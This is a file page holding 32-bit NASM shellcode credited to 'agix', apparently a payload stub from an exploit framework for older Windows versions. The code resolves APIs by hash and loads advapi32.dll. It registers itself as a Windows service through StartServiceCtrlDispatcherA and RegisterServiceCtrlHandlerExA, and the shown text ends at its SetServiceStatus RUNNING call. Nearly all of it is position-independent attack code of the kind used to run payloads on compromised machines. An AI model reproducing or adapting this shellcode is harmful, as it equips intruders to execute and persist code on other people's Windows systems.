Florian Gaultier
64 lines
1.3 KiB
NASM
64 lines
1.3 KiB
NASM
;-----------------------------------------------------------------------------;
|
|
; Author: agix (florian.gaultier[at]gmail[dot]com)
|
|
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
|
|
; Size: 448 bytes
|
|
;-----------------------------------------------------------------------------;
|
|
|
|
[BITS 32]
|
|
; Input: EBP must be the address of 'api_call'.
|
|
|
|
push byte 0x0
|
|
push 0x32336970
|
|
push 0x61766461
|
|
push esp
|
|
push 0x726774c
|
|
call ebp ;load advapi32.dll
|
|
push 0x00454349
|
|
push 0x56524553
|
|
mov ecx, esp ;ServiceTableEntry.SVCNAME
|
|
lea eax, [ebp+0xd0];ServiceTableEntry.SvcMain
|
|
push 0x00000000
|
|
push eax
|
|
push ecx
|
|
mov eax,esp
|
|
push 0x00000000
|
|
push eax
|
|
push 0xCB72F7FA
|
|
call ebp ;call StartServiceCtrlDispatcherA(ServiceTableEntry)
|
|
push 0x00000000
|
|
push 0x56A2B5F0
|
|
call ebp ;call ExitProcess(0)
|
|
pop eax ;SvcCtrlHandler
|
|
pop eax
|
|
pop eax
|
|
pop eax
|
|
xor eax,eax
|
|
ret
|
|
cld ;SvcMain
|
|
call me
|
|
me:
|
|
pop ebp
|
|
sub ebp, 0xd6 ;ebp => hashFunction
|
|
push 0x00464349
|
|
push 0x56524553
|
|
mov ecx, esp ;SVCNAME
|
|
lea eax, [ebp+0xc9];SvcCtrlHandler
|
|
push 0x00000000
|
|
push eax
|
|
push ecx
|
|
push 0x5244AA0B
|
|
call ebp ;RegisterServiceCtrlHandlerExA
|
|
push 0x00000000
|
|
push 0x00000000
|
|
push 0x00000000
|
|
push 0x00000000
|
|
push 0x00000000
|
|
push 0x00000000
|
|
push 0x00000004
|
|
push 0x00000010
|
|
mov ecx, esp
|
|
push 0x00000000
|
|
push ecx
|
|
push eax
|
|
push 0x7D3755C6
|
|
call ebp ;SetServiceStatus RUNNING |